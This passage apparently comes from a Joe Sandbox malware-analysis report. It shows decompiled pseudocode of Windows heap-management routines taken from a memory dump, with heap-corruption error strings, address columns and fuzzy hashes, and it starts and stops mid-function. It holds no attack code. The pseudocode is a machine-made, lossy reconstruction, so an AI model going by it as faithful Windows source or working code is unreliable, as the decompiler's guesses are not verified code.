                                                        										__eflags = _v28;
                                                        										if(_v28 > 0) {
                                                        											goto L34;
                                                        										} else {
                                                        											goto L33;
                                                        										}
                                                        									} else {
                                                        										L33:
                                                        										_t58 = _t256 + 8; // -16
                                                        										 *((intOrPtr*)(_v40 +  *((intOrPtr*)(_t255 + 0x20)))) = _t58;
                                                        										_t206 = _v44;
                                                        										_t217 = _v16;
                                                        										L34:
                                                        										if(_t217 == 0) {
                                                        											asm("bts eax, edx");
                                                        										}
                                                        										goto L36;
                                                        									}
                                                        								} else {
                                                        									goto L24;
                                                        								}
                                                        								while(1) {
                                                        									L24:
                                                        									_t182 =  *_t255;
                                                        									if(_t182 == 0) {
                                                        										_t216 =  *((intOrPtr*)(_t255 + 4)) - 1;
                                                        										__eflags = _t216;
                                                        										goto L28;
                                                        									}
                                                        									_t255 = _t182;
                                                        									if(_t216 >=  *((intOrPtr*)(_t255 + 4))) {
                                                        										continue;
                                                        									} else {
                                                        										goto L28;
                                                        									}
                                                        								}
                                                        								goto L28;
                                                        							}
                                                        						}
                                                        					}
                                                        					L39:
                                                        				} while (_t235 != 0);
                                                        				_t214 = _v12;
                                                        				_t131 =  *(_t206 + 0x54) ^ _t214;
                                                        				 *(_t256 + 4) = _t131;
                                                        				if(_t214 == 0) {
                                                        					__eflags =  *0x18d8748 - 1;
                                                        					if( *0x18d8748 >= 1) {
                                                        						_t127 = _t256 + 0xfff; // 0xfff
                                                        						_t131 = _t127 & 0xfffff000;
                                                        						__eflags = _t131 - _t256;
                                                        						if(_t131 != _t256) {
                                                        							_t156 =  *[fs:0x30];
                                                        							__eflags =  *(_t156 + 0xc);
                                                        							if( *(_t156 + 0xc) == 0) {
                                                        								_push("HEAP: ");
                                                        								E017EB150();
                                                        							} else {
                                                        								E017EB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                        							}
                                                        							_push("ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock");
                                                        							_t131 = E017EB150();
                                                        							__eflags =  *0x18d7bc8;
                                                        							if(__eflags == 0) {
                                                        								_t131 = E018A2073(_t206, 1, _t251, __eflags);
                                                        							}
                                                        						}
                                                        					}
                                                        				}
                                                        				goto L41;
                                                        			}

                                                        0x0180ab27
                                                        0x0180a942
                                                        0x0180a944
                                                        0x0180aaba
                                                        0x0180aabd
                                                        0x0180aac0
                                                        0x0180aac0
                                                        0x0180aac2
                                                        0x0180ab2f
                                                        0x0180aac4
                                                        0x0180aac4
                                                        0x0180aac7
                                                        0x0180aaca
                                                        0x0180aacc
                                                        0x0180aace
                                                        0x0180aace
                                                        0x0180aace
                                                        0x0180aad1
                                                        0x0180aad1
                                                        0x0180aad7
                                                        0x0180aad9
                                                        0x00000000
                                                        0x00000000
                                                        0x01852361
                                                        0x01852369
                                                        0x0185236b
                                                        0x00000000
                                                        0x01852371
                                                        0x00000000
                                                        0x01852371
                                                        0x00000000
                                                        0x0185236b
                                                        0x0180aac0
                                                        0x0180a94a
                                                        0x0180a94a
                                                        0x0180a94d
                                                        0x0180a94d
                                                        0x0180a950
                                                        0x0180a954
                                                        0x01852376
                                                        0x01852380
                                                        0x0180a95a
                                                        0x0180a95a
                                                        0x0180a95c
                                                        0x0180a95f
                                                        0x0180a961
                                                        0x0180a961
                                                        0x0180a967
                                                        0x0180a96a
                                                        0x0180a972
                                                        0x0180aa02
                                                        0x0180aa06
                                                        0x0180aa10
                                                        0x0180aa16
                                                        0x0180aa16
                                                        0x0180aa1b
                                                        0x0180aa21
                                                        0x0180aa24
                                                        0x0180aa27
                                                        0x0180aa29
                                                        0x0180aa2c
                                                        0x0180aa32
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x0180a978
                                                        0x0180a978
                                                        0x0180a97b
                                                        0x0180a981
                                                        0x0180a996
                                                        0x0180a998
                                                        0x0180a99f
                                                        0x0180a9a2
                                                        0x0185238a
                                                        0x0180a9a8
                                                        0x0180a9a8
                                                        0x0180a9a8
                                                        0x0180a9aa
                                                        0x0180a9ad
                                                        0x0180a9b0
                                                        0x0180a9bb
                                                        0x0180a9be
                                                        0x0180a9c7
                                                        0x0180a9c9
                                                        0x0180a9c9
                                                        0x0180a9cc
                                                        0x0180a9d1
                                                        0x0180aa6d
                                                        0x0180aa70
                                                        0x0180aa73
                                                        0x0180aa75
                                                        0x0180aa79
                                                        0x0180aa7e
                                                        0x0180aa82
                                                        0x0180aa8f
                                                        0x0180aa94
                                                        0x0180aa96
                                                        0x01852392
                                                        0x018523a1
                                                        0x018523a1
                                                        0x0180aa9c
                                                        0x0180aa9f
                                                        0x0180aaa2
                                                        0x0180aaa2
                                                        0x0180aaa8
                                                        0x0180aaab
                                                        0x0180aaaf
                                                        0x00000000
                                                        0x0180aab5
                                                        0x00000000
                                                        0x0180aab5
                                                        0x0180a9d7
                                                        0x0180a9d7
                                                        0x0180a9da
                                                        0x0180a9e0
                                                        0x0180a9e3
                                                        0x0180a9e6
                                                        0x0180a9e9
                                                        0x0180a9eb
                                                        0x0180a9fd
                                                        0x0180a9fd
                                                        0x00000000
                                                        0x0180a9eb
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x0180a983
                                                        0x0180a983
                                                        0x0180a983
                                                        0x0180a987
                                                        0x0180a995
                                                        0x0180a995
                                                        0x0180a995
                                                        0x0180a995
                                                        0x0180a989
                                                        0x0180a98e
                                                        0x00000000
                                                        0x0180a990
                                                        0x00000000
                                                        0x0180a990
                                                        0x0180a98e
                                                        0x00000000
                                                        0x0180a983
                                                        0x0180a972
                                                        0x0180a90a
                                                        0x0180aa34
                                                        0x0180aa34
                                                        0x0180aa40
                                                        0x0180aa43
                                                        0x0180aa46
                                                        0x0180aa4d
                                                        0x018523ab
                                                        0x018523b2
                                                        0x018523b8
                                                        0x018523be
                                                        0x018523c3
                                                        0x018523c5
                                                        0x018523cb
                                                        0x018523d1
                                                        0x018523d5
                                                        0x018523f6
                                                        0x018523fb
                                                        0x018523d7
                                                        0x018523ec
                                                        0x018523f1
                                                        0x01852403
                                                        0x01852408
                                                        0x01852410
                                                        0x01852417
                                                        0x01852422
                                                        0x01852422
                                                        0x01852417
                                                        0x018523c5
                                                        0x018523b2
                                                        0x00000000

                                                        Strings
                                                        • HEAP: , xrefs: 018522E6, 018523F6
                                                        • HEAP[%wZ]: , xrefs: 018522D7, 018523E7
                                                        • ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock, xrefs: 01852403
                                                        • ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock)), xrefs: 018522F3
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_17c0000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock))$HEAP: $HEAP[%wZ]: $ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock
                                                        • API String ID: 0-1657114761
                                                        • Opcode ID: 1a0746eea443ae338abda0bbe5f9ed7861dca17988c326295d90cbec583d583d
                                                        • Instruction ID: d2dbc69be9a2beee8d081f0c1ca0359710527d5888786932778c61cdc68bb085
                                                        • Opcode Fuzzy Hash: 1a0746eea443ae338abda0bbe5f9ed7861dca17988c326295d90cbec583d583d
                                                        • Instruction Fuzzy Hash: 72D1BF3460030A8FDB5ACF68C890BA9BBF2FF48304F158569D956DB386D730AA41CB50
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 69%
                                                        			E0180A229(void* __ecx, void* __edx) {
                                                        				signed int _v20;
                                                        				char _v24;
                                                        				char _v28;
                                                        				void* _v44;
                                                        				void* _v48;
                                                        				void* _v56;
                                                        				void* _v60;
                                                        				void* __ebx;
                                                        				signed int _t55;
                                                        				signed int _t57;
                                                        				void* _t61;
                                                        				intOrPtr _t62;
                                                        				void* _t65;
                                                        				void* _t71;
                                                        				signed char* _t74;
                                                        				intOrPtr _t75;
                                                        				signed char* _t80;
                                                        				intOrPtr _t81;
                                                        				void* _t82;
                                                        				signed char* _t85;
                                                        				signed char _t91;
                                                        				void* _t103;
                                                        				void* _t105;
                                                        				void* _t121;
                                                        				void* _t129;
                                                        				signed int _t131;
                                                        				void* _t133;
                                                        
                                                        				_t105 = __ecx;
                                                        				_t133 = (_t131 & 0xfffffff8) - 0x1c;
                                                        				_t103 = __edx;
                                                        				_t129 = __ecx;
                                                        				E0180DF24(__edx,  &_v28, _t133);
                                                        				_t55 =  *(_t129 + 0x40) & 0x00040000;
                                                        				asm("sbb edi, edi");
                                                        				_t121 = ( ~_t55 & 0x0000003c) + 4;
                                                        				if(_t55 != 0) {
                                                        					_push(0);
                                                        					_push(0x14);
                                                        					_push( &_v24);
                                                        					_push(3);
                                                        					_push(_t129);
                                                        					_push(0xffffffff);
                                                        					_t57 = E01829730();
                                                        					__eflags = _t57;
                                                        					if(_t57 < 0) {
                                                        						L17:
                                                        						_push(_t105);
                                                        						E018AA80D(_t129, 1, _v20, 0);
                                                        						_t121 = 4;
                                                        						goto L1;
                                                        					}
                                                        					__eflags = _v20 & 0x00000060;
                                                        					if((_v20 & 0x00000060) == 0) {
                                                        						goto L17;
                                                        					}
                                                        					__eflags = _v24 - _t129;
                                                        					if(_v24 == _t129) {
                                                        						goto L1;
                                                        					}
                                                        					goto L17;
                                                        				}
                                                        				L1:
                                                        				_push(_t121);
                                                        				_push(0x1000);
                                                        				_push(_t133 + 0x14);
                                                        				_push(0);
                                                        				_push(_t133 + 0x20);
                                                        				_push(0xffffffff);
                                                        				_t61 = E01829660();
                                                        				_t122 = _t61;
                                                        				if(_t61 < 0) {
                                                        					_t62 =  *[fs:0x30];
                                                        					 *((intOrPtr*)(_t129 + 0x218)) =  *((intOrPtr*)(_t129 + 0x218)) + 1;
                                                        					__eflags =  *(_t62 + 0xc);
                                                        					if( *(_t62 + 0xc) == 0) {
                                                        						_push("HEAP: ");
                                                        						E017EB150();
                                                        					} else {
                                                        						E017EB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                        					}
                                                        					_push( *((intOrPtr*)(_t133 + 0xc)));
                                                        					_push( *((intOrPtr*)(_t133 + 0x14)));
                                                        					_push(_t129);
                                                        					E017EB150("ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)\n", _t122);
                                                        					_t65 = 0;
                                                        					L13:
                                                        					return _t65;
                                                        				}
                                                        				_t71 = E01807D50();
                                                        				_t124 = 0x7ffe0380;
                                                        				if(_t71 != 0) {
                                                        					_t74 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                                        				} else {
                                                        					_t74 = 0x7ffe0380;
                                                        				}
                                                        				if( *_t74 != 0) {
                                                        					_t75 =  *[fs:0x30];
                                                        					__eflags =  *(_t75 + 0x240) & 0x00000001;
                                                        					if(( *(_t75 + 0x240) & 0x00000001) != 0) {
                                                        						E018A138A(_t103, _t129,  *((intOrPtr*)(_t133 + 0x10)),  *((intOrPtr*)(_t133 + 0x10)), 8);
                                                        					}
                                                        				}
                                                        				 *((intOrPtr*)(_t129 + 0x230)) =  *((intOrPtr*)(_t129 + 0x230)) - 1;
                                                        				 *((intOrPtr*)(_t129 + 0x234)) =  *((intOrPtr*)(_t129 + 0x234)) -  *((intOrPtr*)(_t133 + 0xc));
                                                        				if(E01807D50() != 0) {
                                                        					_t80 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                                        				} else {
                                                        					_t80 = _t124;
                                                        				}
                                                        				if( *_t80 != 0) {
                                                        					_t81 =  *[fs:0x30];
                                                        					__eflags =  *(_t81 + 0x240) & 0x00000001;
                                                        					if(( *(_t81 + 0x240) & 0x00000001) != 0) {
                                                        						__eflags = E01807D50();
                                                        						if(__eflags != 0) {
                                                        							_t124 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                                        							__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                                        						}
                                                        						E018A1582(_t103, _t129,  *((intOrPtr*)(_t133 + 0x10)), __eflags,  *((intOrPtr*)(_t133 + 0x14)),  *(_t129 + 0x74) << 3,  *_t124 & 0x000000ff);
                                                        					}
                                                        				}
                                                        				_t82 = E01807D50();
                                                        				_t125 = 0x7ffe038a;
                                                        				if(_t82 != 0) {
                                                        					_t85 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
                                                        				} else {
                                                        					_t85 = 0x7ffe038a;
                                                        				}
                                                        				if( *_t85 != 0) {
                                                        					__eflags = E01807D50();
                                                        					if(__eflags != 0) {
                                                        						_t125 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
                                                        						__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
                                                        					}
                                                        					E018A1582(_t103, _t129,  *((intOrPtr*)(_t133 + 0x10)), __eflags,  *((intOrPtr*)(_t133 + 0x14)),  *(_t129 + 0x74) << 3,  *_t125 & 0x000000ff);
                                                        				}
                                                        				 *((intOrPtr*)(_t129 + 0x20c)) =  *((intOrPtr*)(_t129 + 0x20c)) + 1;
                                                        				_t91 =  *(_t103 + 2);
                                                        				if((_t91 & 0x00000004) != 0) {
                                                        					E0183D5E0( *((intOrPtr*)(_t133 + 0x18)),  *((intOrPtr*)(_t133 + 0x10)), 0xfeeefeee);
                                                        					_t91 =  *(_t103 + 2);
                                                        				}
                                                        				 *(_t103 + 2) = _t91 & 0x00000017;
                                                        				_t65 = 1;
                                                        				goto L13;
                                                        			}






























                                                        0x0180a2c7
                                                        0x01851d07
                                                        0x01851d0d
                                                        0x01851d14
                                                        0x01851d1f
                                                        0x01851d21
                                                        0x01851d2c
                                                        0x01851d2c
                                                        0x01851d2c
                                                        0x01851d47
                                                        0x01851d47
                                                        0x01851d14
                                                        0x0180a2cd
                                                        0x0180a2d2
                                                        0x0180a2d9
                                                        0x01851d5a
                                                        0x0180a2df
                                                        0x0180a2df
                                                        0x0180a2df
                                                        0x0180a2e4
                                                        0x01851d69
                                                        0x01851d6b
                                                        0x01851d76
                                                        0x01851d76
                                                        0x01851d76
                                                        0x01851d91
                                                        0x01851d91
                                                        0x0180a2ea
                                                        0x0180a2f0
                                                        0x0180a2f5
                                                        0x01851da8
                                                        0x01851dad
                                                        0x01851dad
                                                        0x0180a2fd
                                                        0x0180a300
                                                        0x00000000

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_17c0000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID: HEAP: $HEAP[%wZ]: $ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)$`
                                                        • API String ID: 2994545307-2586055223
                                                        • Opcode ID: ba112dbc768729f0fd171e2fe26e1db6e19724569f9fee3a2919aea19e0a6538
                                                        • Instruction ID: 1387091ae16a3f546ea063be04496b94e198440b4620baefbde282744433aef1
                                                        • Opcode Fuzzy Hash: ba112dbc768729f0fd171e2fe26e1db6e19724569f9fee3a2919aea19e0a6538
                                                        • Instruction Fuzzy Hash: 4251E3322057859FE362DB6CCC48F677BE8EB84B54F080568F955CB2D1D725EA40C762
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_17c0000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID: This is located in the %s field of the heap header.$HEAP: $HEAP[%wZ]: $Heap %p - headers modified (%p is %lx instead of %lx)
                                                        • API String ID: 2994545307-336120773
                                                        • Opcode ID: 7662567e7a9c4da62e9964cc1bab27f276dab18df28177c4f27f3e59b82e957e
                                                        • Instruction ID: 8729698c33a255e0733c943f506cd3df090ccf6e445b0e1a04e5e908653449c4
                                                        • Opcode Fuzzy Hash: 7662567e7a9c4da62e9964cc1bab27f276dab18df28177c4f27f3e59b82e957e
                                                        • Instruction Fuzzy Hash: 6E31F331101115EFEB21DB5DC899F6AB7E8EF04B24F5C405DF505CB251E6B4FA40CA59
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 66%
                                                        			E018A3518(signed int* __ecx) {
                                                        				char _v8;
                                                        				void* _t11;
                                                        				signed int* _t34;
                                                        
                                                        				_push(__ecx);
                                                        				_t34 = __ecx;
                                                        				if(__ecx !=  *((intOrPtr*)( *[fs:0x30] + 0x18))) {
                                                        					if(E017E40E1("RtlDestroyHeap") == 0 || E018A4496(__ecx, 0) == 0) {
                                                        						goto L5;
                                                        					} else {
                                                        						_t32 = __ecx + 0x80;
                                                        						 *((intOrPtr*)(__ecx + 0x60)) = 0;
                                                        						if( *((intOrPtr*)(__ecx + 0x80)) != 0) {
                                                        							_v8 = 0;
                                                        							E0181174B(_t32,  &_v8, 0x8000);
                                                        						}
                                                        						_t11 = 1;
                                                        					}
                                                        				} else {
                                                        					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                        						_push("HEAP: ");
                                                        						E017EB150();
                                                        					} else {
                                                        						E017EB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                        					}
                                                        					E017EB150("May not destroy the process heap at %p\n", _t34);
                                                        					L5:
                                                        					_t11 = 0;
                                                        				}
                                                        				return _t11;
                                                        			}







                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_17c0000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: HEAP: $HEAP[%wZ]: $May not destroy the process heap at %p$RtlDestroyHeap
                                                        • API String ID: 0-4256168463
                                                        • Opcode ID: 227f102b194a901efcc73ef50d486072df489fa60fe3965d4463d63e27b20528
                                                        • Instruction ID: 8dea966b8ff43ef5d0711a1014d0693dd2f8d9564a02ba97085fd534ba8cb97f
                                                        • Opcode Fuzzy Hash: 227f102b194a901efcc73ef50d486072df489fa60fe3965d4463d63e27b20528
                                                        • Instruction Fuzzy Hash: 430145321116059FEB21EB6D848CBAAB7E8FB45B20F04845EF886DB345DA70EB40CA51
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 78%
                                                        			E018099BF(signed int __ecx, signed short* __edx, signed int* _a4, signed int _a8) {
                                                        				char _v5;
                                                        				signed int _v12;
                                                        				signed int _v16;
                                                        				signed short _v20;
                                                        				void* __ebx;
                                                        				void* __edi;
                                                        				void* __esi;
                                                        				void* __ebp;
                                                        				signed short _t186;
                                                        				intOrPtr _t187;
                                                        				signed short _t190;
                                                        				signed int _t196;
                                                        				signed short _t197;
                                                        				intOrPtr _t203;
                                                        				signed int _t207;
                                                        				signed int _t210;
                                                        				signed short _t215;
                                                        				intOrPtr _t216;
                                                        				signed short _t219;
                                                        				signed int _t221;
                                                        				signed short _t222;
                                                        				intOrPtr _t228;
                                                        				signed int _t232;
                                                        				signed int _t235;
                                                        				signed int _t250;
                                                        				signed short _t251;
                                                        				intOrPtr _t252;
                                                        				signed short _t254;
                                                        				intOrPtr _t255;
                                                        				signed int _t258;
                                                        				signed int _t259;
                                                        				signed short _t262;
                                                        				intOrPtr _t271;
                                                        				signed int _t279;
                                                        				signed int _t282;
                                                        				signed int _t284;
                                                        				signed int _t286;
                                                        				intOrPtr _t292;
                                                        				signed int _t296;
                                                        				signed int _t299;
                                                        				signed int _t307;
                                                        				signed int* _t309;
                                                        				signed short* _t311;
                                                        				signed short* _t313;
                                                        				signed char _t314;
                                                        				intOrPtr _t316;
                                                        				signed int _t323;
                                                        				signed char _t328;
                                                        				signed short* _t330;
                                                        				signed char _t331;
                                                        				intOrPtr _t335;
                                                        				signed int _t342;
                                                        				signed char _t347;
                                                        				signed short* _t348;
                                                        				signed short* _t350;
                                                        				signed short _t352;
                                                        				signed char _t354;
                                                        				intOrPtr _t357;
                                                        				intOrPtr* _t364;
                                                        				signed char _t365;
                                                        				intOrPtr _t366;
                                                        				signed int _t373;
                                                        				signed char _t378;
                                                        				signed int* _t381;
                                                        				signed int _t382;
                                                        				signed short _t384;
                                                        				signed int _t386;
                                                        				unsigned int _t390;
                                                        				signed int _t393;
                                                        				signed int* _t394;
                                                        				unsigned int _t398;
                                                        				signed short _t400;
                                                        				signed short _t402;
                                                        				signed int _t404;
                                                        				signed int _t407;
                                                        				unsigned int _t411;
                                                        				signed short* _t414;
                                                        				signed int _t415;
                                                        				signed short* _t419;
                                                        				signed int* _t420;
                                                        				void* _t421;
                                                        
                                                        				_t414 = __edx;
                                                        				_t307 = __ecx;
                                                        				_t419 = __edx - (( *(__edx + 4) & 0x0000ffff ^  *(__ecx + 0x54) & 0x0000ffff) << 3);
                                                        				if(_t419 == __edx || (( *(__ecx + 0x4c) >> 0x00000014 &  *(__ecx + 0x52) ^ _t419[1]) & 0x00000001) != 0) {
                                                        					_v5 = _a8;
                                                        					L3:
                                                        					_t381 = _a4;
                                                        					goto L4;
                                                        				} else {
                                                        					__eflags =  *(__ecx + 0x4c);
                                                        					if( *(__ecx + 0x4c) != 0) {
                                                        						_t411 =  *(__ecx + 0x50) ^  *_t419;
                                                        						 *_t419 = _t411;
                                                        						_t378 = _t411 >> 0x00000010 ^ _t411 >> 0x00000008 ^ _t411;
                                                        						__eflags = _t411 >> 0x18 - _t378;
                                                        						if(__eflags != 0) {
                                                        							_push(_t378);
                                                        							E0189FA2B(__ecx, __ecx, _t419, __edx, _t419, __eflags);
                                                        						}
                                                        					}
                                                        					_t250 = _a8;
                                                        					_v5 = _t250;
                                                        					__eflags = _t250;
                                                        					if(_t250 != 0) {
                                                        						_t400 = _t414[6];
                                                        						_t53 =  &(_t414[4]); // -16
                                                        						_t348 = _t53;
                                                        						_t251 =  *_t348;
                                                        						_v12 = _t251;
                                                        						_v16 = _t400;
                                                        						_t252 =  *((intOrPtr*)(_t251 + 4));
                                                        						__eflags =  *_t400 - _t252;
                                                        						if( *_t400 != _t252) {
                                                        							L49:
                                                        							_push(_t348);
                                                        							_push( *_t400);
                                                        							E018AA80D(_t307, 0xd, _t348, _t252);
                                                        							L50:
                                                        							_v5 = 0;
                                                        							goto L11;
                                                        						}
                                                        						__eflags =  *_t400 - _t348;
                                                        						if( *_t400 != _t348) {
                                                        							goto L49;
                                                        						}
                                                        						 *((intOrPtr*)(_t307 + 0x74)) =  *((intOrPtr*)(_t307 + 0x74)) - ( *_t414 & 0x0000ffff);
                                                        						_t407 =  *(_t307 + 0xb4);
                                                        						__eflags = _t407;
                                                        						if(_t407 == 0) {
                                                        							L36:
                                                        							_t364 = _v16;
                                                        							_t282 = _v12;
                                                        							 *_t364 = _t282;
                                                        							 *((intOrPtr*)(_t282 + 4)) = _t364;
                                                        							__eflags = _t414[1] & 0x00000008;
                                                        							if((_t414[1] & 0x00000008) == 0) {
                                                        								L39:
                                                        								_t365 = _t414[1];
                                                        								__eflags = _t365 & 0x00000004;
                                                        								if((_t365 & 0x00000004) != 0) {
                                                        									_t284 = ( *_t414 & 0x0000ffff) * 8 - 0x10;
                                                        									_v12 = _t284;
                                                        									__eflags = _t365 & 0x00000002;
                                                        									if((_t365 & 0x00000002) != 0) {
                                                        										__eflags = _t284 - 4;
                                                        										if(_t284 > 4) {
                                                        											_t284 = _t284 - 4;
                                                        											__eflags = _t284;
                                                        											_v12 = _t284;
                                                        										}
                                                        									}
                                                        									_t78 =  &(_t414[8]); // -8
                                                        									_t286 = E0183D540(_t78, _t284, 0xfeeefeee);
                                                        									_v16 = _t286;
                                                        									__eflags = _t286 - _v12;
                                                        									if(_t286 != _v12) {
                                                        										_t366 =  *[fs:0x30];
                                                        										__eflags =  *(_t366 + 0xc);
                                                        										if( *(_t366 + 0xc) == 0) {
                                                        											_push("HEAP: ");
                                                        											E017EB150();
                                                        										} else {
                                                        											E017EB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                        										}
                                                        										_push(_v16 + 0x10 + _t414);
                                                        										E017EB150("HEAP: Free Heap block %p modified at %p after it was freed\n", _t414);
                                                        										_t292 =  *[fs:0x30];
                                                        										_t421 = _t421 + 0xc;
                                                        										__eflags =  *((char*)(_t292 + 2));
                                                        										if( *((char*)(_t292 + 2)) != 0) {
                                                        											 *0x18d6378 = 1;
                                                        											asm("int3");
                                                        											 *0x18d6378 = 0;
                                                        										}
                                                        									}
                                                        								}
                                                        								goto L50;
                                                        							}
                                                        							_t296 = E0180A229(_t307, _t414);
                                                        							__eflags = _t296;
                                                        							if(_t296 != 0) {
                                                        								goto L39;
                                                        							} else {
                                                        								E0180A309(_t307, _t414,  *_t414 & 0x0000ffff, 1);
                                                        								goto L50;
                                                        							}
                                                        						} else {
                                                        							_t373 =  *_t414 & 0x0000ffff;
                                                        							while(1) {
                                                        								__eflags = _t373 -  *((intOrPtr*)(_t407 + 4));
                                                        								if(_t373 <  *((intOrPtr*)(_t407 + 4))) {
                                                        									_t301 = _t373;
                                                        									break;
                                                        								}
                                                        								_t299 =  *_t407;
                                                        								__eflags = _t299;
                                                        								if(_t299 == 0) {
                                                        									_t301 =  *((intOrPtr*)(_t407 + 4)) - 1;
                                                        									__eflags =  *((intOrPtr*)(_t407 + 4)) - 1;
                                                        									break;
                                                        								} else {
                                                        									_t407 = _t299;
                                                        									continue;
                                                        								}
                                                        							}
                                                        							_t62 =  &(_t414[4]); // -16
                                                        							E0180BC04(_t307, _t407, 1, _t62, _t301, _t373);
                                                        							goto L36;
                                                        						}
                                                        					}
                                                        					L11:
                                                        					_t402 = _t419[6];
                                                        					_t25 =  &(_t419[4]); // -16
                                                        					_t350 = _t25;
                                                        					_t254 =  *_t350;
                                                        					_v12 = _t254;
                                                        					_v20 = _t402;
                                                        					_t255 =  *((intOrPtr*)(_t254 + 4));
                                                        					__eflags =  *_t402 - _t255;
                                                        					if( *_t402 != _t255) {
                                                        						L61:
                                                        						_push(_t350);
                                                        						_push( *_t402);
                                                        						E018AA80D(_t307, 0xd, _t350, _t255);
                                                        						goto L3;
                                                        					}
                                                        					__eflags =  *_t402 - _t350;
                                                        					if( *_t402 != _t350) {
                                                        						goto L61;
                                                        					}
                                                        					 *((intOrPtr*)(_t307 + 0x74)) =  *((intOrPtr*)(_t307 + 0x74)) - ( *_t419 & 0x0000ffff);
                                                        					_t404 =  *(_t307 + 0xb4);
                                                        					__eflags = _t404;
                                                        					if(_t404 == 0) {
                                                        						L20:
                                                        						_t352 = _v20;
                                                        						_t258 = _v12;
                                                        						 *_t352 = _t258;
                                                        						 *(_t258 + 4) = _t352;
                                                        						__eflags = _t419[1] & 0x00000008;
                                                        						if((_t419[1] & 0x00000008) != 0) {
                                                        							_t259 = E0180A229(_t307, _t419);
                                                        							__eflags = _t259;
                                                        							if(_t259 != 0) {
                                                        								goto L21;
                                                        							} else {
                                                        								E0180A309(_t307, _t419,  *_t419 & 0x0000ffff, 1);
                                                        								goto L3;
                                                        							}
                                                        						}
                                                        						L21:
                                                        						_t354 = _t419[1];
                                                        						__eflags = _t354 & 0x00000004;
                                                        						if((_t354 & 0x00000004) != 0) {
                                                        							_t415 = ( *_t419 & 0x0000ffff) * 8 - 0x10;
                                                        							__eflags = _t354 & 0x00000002;
                                                        							if((_t354 & 0x00000002) != 0) {
                                                        								__eflags = _t415 - 4;
                                                        								if(_t415 > 4) {
                                                        									_t415 = _t415 - 4;
                                                        									__eflags = _t415;
                                                        								}
                                                        							}
                                                        							_t91 =  &(_t419[8]); // -8
                                                        							_t262 = E0183D540(_t91, _t415, 0xfeeefeee);
                                                        							_v20 = _t262;
                                                        							__eflags = _t262 - _t415;
                                                        							if(_t262 != _t415) {
                                                        								_t357 =  *[fs:0x30];
                                                        								__eflags =  *(_t357 + 0xc);
                                                        								if( *(_t357 + 0xc) == 0) {
                                                        									_push("HEAP: ");
                                                        									E017EB150();
                                                        								} else {
                                                        									E017EB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                        								}
                                                        								_push(_v20 + 0x10 + _t419);
                                                        								E017EB150("HEAP: Free Heap block %p modified at %p after it was freed\n", _t419);
                                                        								_t271 =  *[fs:0x30];
                                                        								_t421 = _t421 + 0xc;
                                                        								__eflags =  *((char*)(_t271 + 2));
                                                        								if( *((char*)(_t271 + 2)) != 0) {
                                                        									 *0x18d6378 = 1;
                                                        									asm("int3");
                                                        									 *0x18d6378 = 0;
                                                        								}
                                                        							}
                                                        						}
                                                        						_t381 = _a4;
                                                        						_t414 = _t419;
